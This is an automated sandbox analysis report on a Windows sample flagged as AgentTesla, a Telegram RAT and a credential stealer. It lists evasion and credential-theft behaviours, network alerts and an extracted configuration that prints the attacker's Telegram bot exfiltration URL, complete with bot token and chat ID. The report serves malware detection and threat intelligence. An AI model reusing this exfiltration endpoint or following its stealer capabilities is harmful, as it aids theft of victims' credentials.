Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
gq8sce-clean.com.com.exe

Overview

General Information

Sample name:gq8sce-clean.com.com.exe
Analysis ID:1619245
MD5:07204fe9a49ed5d81a374b581fa0f28f
SHA1:634a80dd70ff05559dcdbb3c596812e74e138c30
SHA256:4b28f2d12a371caffd53ea2375395e33a8fcd238828586d1ff82be2d7aeac3e9
Tags:bot7592112496DropBoxexefiles-catbox-moekvrcmhqc-ngrok-ioZolaKeyloggeruser-marsomx
Infos:

Detection

AgentTesla, Discord Token Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected Discord Token Stealer
Yara detected Telegram RAT
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • gq8sce-clean.com.com.exe (PID: 4668 cmdline: "C:\Users\user\Desktop\gq8sce-clean.com.com.exe" MD5: 07204FE9A49ED5D81A374B581FA0F28F)
  • OgBoRN.exe (PID: 6656 cmdline: "C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe" MD5: 07204FE9A49ED5D81A374B581FA0F28F)
  • OgBoRN.exe (PID: 5588 cmdline: "C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe" MD5: 07204FE9A49ED5D81A374B581FA0F28F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendMessage?chat_id=6089330336"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.2401382417.0000000007D27000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000003.00000002.2401382417.0000000007D27000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000004.00000002.4629529277.0000000007B6C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000004.00000002.4629529277.0000000007B6C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            00000000.00000002.4620180662.0000000006ECB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 27 entries

              Sigma Signatures

              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\gq8sce-clean.com.com.exe, ProcessId: 4668, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OgBoRN

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-19T18:03:35.283867+010028517791Malware Command and Control Activity Detected192.168.2.549707149.154.167.220443TCP
              2025-02-19T18:03:51.961887+010028517791Malware Command and Control Activity Detected192.168.2.549767149.154.167.220443TCP
              2025-02-19T18:04:00.253058+010028517791Malware Command and Control Activity Detected192.168.2.549822149.154.167.220443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-19T18:03:35.283867+010028528151Malware Command and Control Activity Detected192.168.2.549707149.154.167.220443TCP
              2025-02-19T18:03:36.529991+010028528151Malware Command and Control Activity Detected192.168.2.549708149.154.167.220443TCP
              2025-02-19T18:03:51.961887+010028528151Malware Command and Control Activity Detected192.168.2.549767149.154.167.220443TCP
              2025-02-19T18:03:53.211057+010028528151Malware Command and Control Activity Detected192.168.2.549778149.154.167.220443TCP
              2025-02-19T18:04:00.253058+010028528151Malware Command and Control Activity Detected192.168.2.549822149.154.167.220443TCP
              2025-02-19T18:04:01.453990+010028528151Malware Command and Control Activity Detected192.168.2.549833149.154.167.220443TCP
              2025-02-19T18:05:00.905852+010028528151Malware Command and Control Activity Detected192.168.2.549990149.154.167.220443TCP
              2025-02-19T18:05:03.328681+010028528151Malware Command and Control Activity Detected192.168.2.549991149.154.167.220443TCP
              2025-02-19T18:05:30.709900+010028528151Malware Command and Control Activity Detected192.168.2.549992149.154.167.220443TCP
              2025-02-19T18:05:33.920333+010028528151Malware Command and Control Activity Detected192.168.2.549993149.154.167.220443TCP
              2025-02-19T18:05:36.960131+010028528151Malware Command and Control Activity Detected192.168.2.549994149.154.167.220443TCP
              2025-02-19T18:05:37.356132+010028528151Malware Command and Control Activity Detected192.168.2.549995149.154.167.220443TCP
              2025-02-19T18:05:38.412033+010028528151Malware Command and Control Activity Detected192.168.2.549996149.154.167.220443TCP
              2025-02-19T18:05:39.200970+010028528151Malware Command and Control Activity Detected192.168.2.549997149.154.167.220443TCP
              2025-02-19T18:05:45.269875+010028528151Malware Command and Control Activity Detected192.168.2.549998149.154.167.220443TCP
              2025-02-19T18:05:45.595638+010028528151Malware Command and Control Activity Detected192.168.2.549999149.154.167.220443TCP
              2025-02-19T18:05:49.012018+010028528151Malware Command and Control Activity Detected192.168.2.550000149.154.167.220443TCP
              2025-02-19T18:05:50.189117+010028528151Malware Command and Control Activity Detected192.168.2.550001149.154.167.220443TCP
              2025-02-19T18:06:09.214055+010028528151Malware Command and Control Activity Detected192.168.2.550002149.154.167.220443TCP
              2025-02-19T18:06:10.729552+010028528151Malware Command and Control Activity Detected192.168.2.550003149.154.167.220443TCP
              2025-02-19T18:06:11.257226+010028528151Malware Command and Control Activity Detected192.168.2.550004149.154.167.220443TCP
              2025-02-19T18:06:22.996443+010028528151Malware Command and Control Activity Detected192.168.2.550005149.154.167.220443TCP
              2025-02-19T18:06:31.960977+010028528151Malware Command and Control Activity Detected192.168.2.550006149.154.167.220443TCP
              2025-02-19T18:06:35.161807+010028528151Malware Command and Control Activity Detected192.168.2.550007149.154.167.220443TCP
              2025-02-19T18:06:56.883691+010028528151Malware Command and Control Activity Detected192.168.2.550008149.154.167.220443TCP
              2025-02-19T18:07:05.389448+010028528151Malware Command and Control Activity Detected192.168.2.550009149.154.167.220443TCP
              2025-02-19T18:07:10.136433+010028528151Malware Command and Control Activity Detected192.168.2.550010149.154.167.220443TCP
              2025-02-19T18:07:14.575917+010028528151Malware Command and Control Activity Detected192.168.2.550011149.154.167.220443TCP
              2025-02-19T18:07:24.875136+010028528151Malware Command and Control Activity Detected192.168.2.550012149.154.167.220443TCP
              2025-02-19T18:07:24.950294+010028528151Malware Command and Control Activity Detected192.168.2.550013149.154.167.220443TCP
              2025-02-19T18:07:44.465223+010028528151Malware Command and Control Activity Detected192.168.2.550015149.154.167.220443TCP
              2025-02-19T18:07:45.031484+010028528151Malware Command and Control Activity Detected192.168.2.550016149.154.167.220443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-19T18:03:35.283883+010028542811A Network Trojan was detected149.154.167.220443192.168.2.549707TCP
              2025-02-19T18:03:36.530218+010028542811A Network Trojan was detected149.154.167.220443192.168.2.549708TCP
              2025-02-19T18:03:51.962109+010028542811A Network Trojan was detected149.154.167.220443192.168.2.549767TCP
              2025-02-19T18:03:53.211383+010028542811A Network Trojan was detected149.154.167.220443192.168.2.549778TCP
              2025-02-19T18:04:00.253227+010028542811A Network Trojan was detected149.154.167.220443192.168.2.549822TCP
              2025-02-19T18:04:01.454258+010028542811A Network Trojan was detected149.154.167.220443192.168.2.549833TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-19T18:03:34.940295+010018100081Potentially Bad Traffic192.168.2.549707149.154.167.220443TCP
              2025-02-19T18:03:36.278410+010018100081Potentially Bad Traffic192.168.2.549708149.154.167.220443TCP
              2025-02-19T18:03:51.720019+010018100081Potentially Bad Traffic192.168.2.549767149.154.167.220443TCP
              2025-02-19T18:03:52.944153+010018100081Potentially Bad Traffic192.168.2.549778149.154.167.220443TCP
              2025-02-19T18:03:59.958365+010018100081Potentially Bad Traffic192.168.2.549822149.154.167.220443TCP
              2025-02-19T18:04:01.226593+010018100081Potentially Bad Traffic192.168.2.549833149.154.167.220443TCP
              2025-02-19T18:05:00.902938+010018100081Potentially Bad Traffic192.168.2.549990149.154.167.220443TCP
              2025-02-19T18:05:03.327639+010018100081Potentially Bad Traffic192.168.2.549991149.154.167.220443TCP
              2025-02-19T18:05:30.707636+010018100081Potentially Bad Traffic192.168.2.549992149.154.167.220443TCP
              2025-02-19T18:05:33.919393+010018100081Potentially Bad Traffic192.168.2.549993149.154.167.220443TCP
              2025-02-19T18:05:36.943891+010018100081Potentially Bad Traffic192.168.2.549994149.154.167.220443TCP
              2025-02-19T18:05:37.355072+010018100081Potentially Bad Traffic192.168.2.549995149.154.167.220443TCP
              2025-02-19T18:05:38.388316+010018100081Potentially Bad Traffic192.168.2.549996149.154.167.220443TCP
              2025-02-19T18:05:39.200125+010018100081Potentially Bad Traffic192.168.2.549997149.154.167.220443TCP
              2025-02-19T18:05:45.268770+010018100081Potentially Bad Traffic192.168.2.549998149.154.167.220443TCP
              2025-02-19T18:05:45.594697+010018100081Potentially Bad Traffic192.168.2.549999149.154.167.220443TCP
              2025-02-19T18:05:49.009597+010018100081Potentially Bad Traffic192.168.2.550000149.154.167.220443TCP
              2025-02-19T18:05:50.188205+010018100081Potentially Bad Traffic192.168.2.550001149.154.167.220443TCP
              2025-02-19T18:06:09.212451+010018100081Potentially Bad Traffic192.168.2.550002149.154.167.220443TCP
              2025-02-19T18:06:10.728620+010018100081Potentially Bad Traffic192.168.2.550003149.154.167.220443TCP
              2025-02-19T18:06:11.256333+010018100081Potentially Bad Traffic192.168.2.550004149.154.167.220443TCP
              2025-02-19T18:06:22.975386+010018100081Potentially Bad Traffic192.168.2.550005149.154.167.220443TCP
              2025-02-19T18:06:31.960137+010018100081Potentially Bad Traffic192.168.2.550006149.154.167.220443TCP
              2025-02-19T18:06:35.159474+010018100081Potentially Bad Traffic192.168.2.550007149.154.167.220443TCP
              2025-02-19T18:06:56.882485+010018100081Potentially Bad Traffic192.168.2.550008149.154.167.220443TCP
              2025-02-19T18:07:05.388197+010018100081Potentially Bad Traffic192.168.2.550009149.154.167.220443TCP
              2025-02-19T18:07:10.130874+010018100081Potentially Bad Traffic192.168.2.550010149.154.167.220443TCP
              2025-02-19T18:07:14.574737+010018100081Potentially Bad Traffic192.168.2.550011149.154.167.220443TCP
              2025-02-19T18:07:24.872651+010018100081Potentially Bad Traffic192.168.2.550012149.154.167.220443TCP
              2025-02-19T18:07:24.946298+010018100081Potentially Bad Traffic192.168.2.550013149.154.167.220443TCP
              2025-02-19T18:07:43.540626+010018100081Potentially Bad Traffic192.168.2.550014149.154.167.220443TCP
              2025-02-19T18:07:44.464422+010018100081Potentially Bad Traffic192.168.2.550015149.154.167.220443TCP
              2025-02-19T18:07:45.030575+010018100081Potentially Bad Traffic192.168.2.550016149.154.167.220443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: OgBoRN.exe.6656.3.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendMessage"}
              Source: OgBoRN.exe.6656.3.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendMessage?chat_id=6089330336"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeReversingLabs: Detection: 44%
              Multi AV Scanner detection for submitted file
              Source: gq8sce-clean.com.com.exeReversingLabs: Detection: 44%
              Source: gq8sce-clean.com.com.exeVirustotal: Detection: 27%Perma Link
              Joe Sandbox ML detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: gq8sce-clean.com.com.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 3.125.209.94:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49749 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 3.125.209.94:443 -> 192.168.2.5:49756 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49767 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49799 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 3.125.209.94:443 -> 192.168.2.5:49811 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49822 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49996 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50015 version: TLS 1.2
              Source: gq8sce-clean.com.com.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Managed source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
